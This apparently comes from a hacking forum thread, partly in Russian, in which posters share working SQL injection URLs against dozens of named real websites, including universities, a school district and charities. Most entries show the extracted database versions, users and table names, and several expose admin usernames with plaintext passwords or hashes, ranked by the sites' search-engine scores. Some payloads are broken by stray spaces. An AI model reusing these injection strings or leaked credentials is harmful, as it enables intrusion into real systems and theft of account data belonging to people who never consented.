PR: 5 http://www2.dse.unibo.it/dsa/profile.php?id=-1+union+select+1,2,3,4,versio n(),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20, 21,22,2 3,24 ,25,26-- 5.0.41-log on9Tb Ha6oP tables: http://www2.dse.unibo.it/dsa/profile.php?id=-1+union+select+1,2,3,4,group_concat(table_name),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,2 4,25,26+from+information_schema .tables+group+by+table_s chema+limit+0,1-- Code: acquisti,acquisti_dettagli,biblioteca,checklist,computer,concorsi,decreti,dsa_lista_attesa,dsa_log_richiesta_intervento,dsa_utenti,elenco_software,int_report,int_richieste,log_accessi,messaggi,monitor,ni_cliente,ni_compatibilita_ricambio_stampante,ni_log_consumabili,ni_magazzino_ricambi_stampante,ni_modello_stampante,ni_oggetto,ni_on ####################################### PR: 4 http://it.pewaukee.k12.wi.us/employment/ath_jo bs/viewjobcategory_ath.php?ID=-1+union +s elect+1,concat_ws(0x3a,version(),databas e() ,user()),3/* 4.0.26a:employ_athl:jappt@localhost
[Site]: http://banzaj-ra.com [Info]: 5.0.51-log:[email protected]:1gbua_x_banza5aa [Sploit]: http://banzaj-ra.com/index.php?mod=news&id=-1+union+select+1,concat_ws(0x3a,login,password,mail),3,4+from+user-- P.S. Кавычки пропускает, но вроде как прав не хватает.
URL: http://www.sbiznis.com/grad.php?id=138+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14 INFO: http://www.sbiznis.com/grad.php?id=-138+union+select+1,2,concat_ws(0x3a,version(),user(),database()),4,5,6,7,8,9,10,11,12,13,14 4.0.27-max-log:[email protected]:sbiznis DIR SITE: /home/content/b/i/z/biznis/html
Кстати вот ещё: особенно не раскручивал, но думаю сойдёт http://www.biomedicas.unam.mx/investigacionFrame.asp?ID=MG%27+or+1=(select+top+1+table_name+from+information_schema.tables)+--+
Code: http://www.deltarescue.org/deltarescue/war/item.php?id=-21+union+select+1,cast(concat_ws(0x3a,version(),database(),user())+as+binary),3,4,5,6,7-- 4.1.11-Debian_4sarge8-log:deltarescue:deltarescue@localhost _____ Code: http://www.minelab.com/consumer/page.php?section=-128+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8,9,10,11,12,13,14,15-- 4.0.24-nt-max-log:vs255889_1:[email protected]
<<Newton's Apple>> Code: http://www.newtonsapple.tv/TeacherGuide.php?id=902'+union+select+1,2,3,concat_ws(0x3a2a3a,version(),database(),user(),@@version_compile_os),5,6,7,8,9,0,1,2,3,4,5--+
http://test.omnisoftsol.com/listing_video.php?catid=3 version(): 4.1.22-standard user(): omnisoft@localhost database(): vsec_test Tables: customers phpads_config phpads_clients products phpads_affiliates http://www.surfchanneltv.net/listing_video.php?catid=29 version(): 4.1.22-standard user(): surfchan@localhost database(): surfchan Tables: customers phpads_config phpads_clients products phpads_affiliates
PR4 http://www.stpaulseatingdisorders.ca/content.php?id=-17+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16+/*+ http://www.context-market.ru/news.php?id=198&item=225+union+select+1,2,database(),4,5,6,7,8,9,10+/*+ cmarket
http://www.amento.ru/news/new.php?id=-16+union+select+1,2,3,concat_ws(0x3a,version(),user(),database()),5 4.1.22-log:amento@localhost:amento http://www.amento.ru/news/new.php?id=-16+union+select+1,2,3,concat_ws(0x3a,user,password),5+from+users amento:5c8904a4b82b1f9bfc3a115cfcd30528 админка: http://www.amento.ru/admin/ PR 0, ТИЦ 20
Web director http://www.ldmstudio.com/director/detalii_site.php?id=-4677+UNION+SELECT+1,2,concat_ws(0x3a,version(),database(),useR(),@@version_compile_os),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22-- Database Version: 5.0.77-community-log Database name: ldm_director User name: ldm_ldmbd@localhost Os: pc-linux-gnu
ТИЦ: 50 PR: 2 http://www.svto.ru/page.php?id=-1+union+select+1,2,3,version(),5,6,7,8,9,10/* 5.0.45 http://www.svto.ru/page.php?id=-1+union+select+1,2,3,group_concat(table_name),5,6,7,8,9,10+from+information_schema.tables+group+by+table_schema+limit+1,1/* Code: svto_pages,svto_member,svto_group_tov,svto_service,svto_admins,svto_product,svto_news,svto_guestbook,svto_tovar,svto_banners,svto_rubric,svto_offer,svto_korz,svto_users,svto_feedback,svto_series,svto_order,svto_manufacturer,svto_gallery_pics,svto_series1,svto_about 5
PR5 http://www.abandonware-france.org/ltf_abandon/ltf_solutions.php?id_soluce=-146+union+select+1,2,3,concat(0x2C,id,char(58),pseudo,char(58),password,char(58),droits,char(58),type,0x2C),5+from+ltfv5_admin_membres-- 1:wokie:revol-6::sadmin 2:wille:revol-6::sadmin 3:batjijo:revol-6::admin 4:sophie:ghost::admin 5seudopode:ltf0408pseudo::admin 6:ryf:revol-6::admin 7:maxou:revol-6::admin 8:victor:revol-6::admin 9:godcedric:*****::admin 10:roger:xxxxxxx::membre 11:Barbarian_bros:Leprince_Wyliam::sadmin 12:lordseb:djradio08::admin 13:zappy:krasno::admin 14:ubn22:evangelion::sadmin 15:Mendo:22249440::admin, Сайт ОГРОМНЫЙ !!! админку так и не нашёл((
ТИЦ: 40 PR: 3 http://www.knigazhizny.ru/view_zavalinka.php?id=-1'+union+select+1,version(),3,4,5,6,7,8,9,10+--+ 5.0.67-community Code: online,zavalinka,book,comments,galstuk,settings,catclass,comments_setting,gazeta,staty,categories,detcvo,kuhny,navigation,userlist,biblioteka,class,dnevnik http://www.knigazhizny.ru/view_zavalinka.php?id=-1'+union+sel ect+1,group_concat(concat_ws(0x3a,user,pass)),3,4,5,6,7,8,9, 10+from+u serlis t+--+ domhoz:hozd
http://www.liveatdot.com/program/details.php?id=224+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26+LIMIT+1,1 Database Version: 5.0.26 Database name: liveatdot_dates User name: liveatdot22@localhost
http://www.freetests.ru/states.php?act=show&id=-1+union+select+1,2,version(),4,5-- 5.0.67-percona-highperf-b7-log http://www.freetests.ru/states.php?act=show&id=-1+union+select+1,2,group _concat(table_name),4,5+from+information_schema.tables+group+by+t able_schem a+limit+0,1-- Code: ft_main,jos_polls,fr_news,jos_core_acl_aro_groups,wp_terms,ft_result,jos_template_positions,fr_themes,jos_core_log_searches,ft_update,jos_weblinks,ft_addit,jos_messages,eco_buyes,jos_bannerfinish,stroika23_news,ft_forum_themes,jos_newsfeeds,eco_states,jos_content,wp_postmeta,ft_news,jos_sections,fr_passwords,jos_core_acl_aro_sections,wp_usermeta,ft_stat,jos_templates_menu,fr_trans,jos_groups,ft_users,kan_gb,ft_cat,jos_messages_cfg,eco_cats,jos_categories,wp_comments,ft_gb,jos_poll_data,eco_users,jos_content_frontpage,wp_posts,fr_answers,jos_content_rating,wp_term_relationships,ft_passwords,jos_session,fr_posts,jos_core_acl_groups_aro_map,wp_users,ft_states,jos_users,fr_users,jos_mambots,boris_cats,jos_banner,kan_news,ft_forum_forums,jos_modules,eco_citats,jos_components,wp_links,ft_mail,jos_poll_date,fr_cats,jos_core_acl_aro,wp_term_taxonomy,ft_question,jos_stats_agents,fr_system,jos_core_log_items,ft_subscribe,jos_usertypes,fr_userup,jos_menu,boris_photos,jos_bannerclient,stroika23_content,ft_forum_posts,jos
globalmentalhealth.org Pr-5 Форум: http://globalmentalhealth.org/forum/ Code: http://www.globalmentalhealth.org/articles.php?id=-1+union+select+1,2,null,schema_name,5,6,7,8,9,10+from+information_schema.schemata+limit+2,1 gmhorg_phpBB Code: http://www.globalmentalhealth.org/articles.php?id=-1+union+select+1,2,null,concat(username,0x3a,user_password),5,6,7,8,9,10+from+gmhorg_phpBB.phpbb_users+limit+1,1 bala:$H$7zp4zVUO3SA6YklQHSK2rex6B71r0F1 расшифровывать не хочу.
http://www.baby-knitting.ru/prod.php?md=-11+union+select+1,2,concat_ws(version(),user(),database()),4,5,6,7,8,9,10,11,12,13 [email protected]_babykn http://www.baby-knitting.ru/prod.php?md=-11+union+select+1,2,table_name,4,5,6,7,8,9,10,11,12,13+from+information_schema.tables pr2,тиц 210
http://moraru.ru/prod.php?id_product=-4+union+select+1,concat_ws(0x3a,version(),user(),database()),3,4,5,6,7,8,9,10,11,12-- 5.0.67-log:[email protected]:u156180 http://moraru.ru/prod.php?id_product=-4+union+select+1,table_name,3,4,5,6,7,8,9,10,11,12+from+information_schema.tables-- большое количество таблиц, около 300. там нашел таблицу: b_user http://moraru.ru/prod.php?id_product=-4+union+select+1,concat_ws(0x3a,login,password),3,4,5,6,7,8,9,10,11,12+from+b_user-- admin:Iq{28kX{10d8e0838e85fcc17ccd06fe9eb9af4f PR 2, ТИЦ 10
http://totalshottrainer.com/content.php?id=-4+union+select+1,database(),3,4,5,6,7,8,9,10,11,12,13,14,15+/*+ totalsho_totalsho
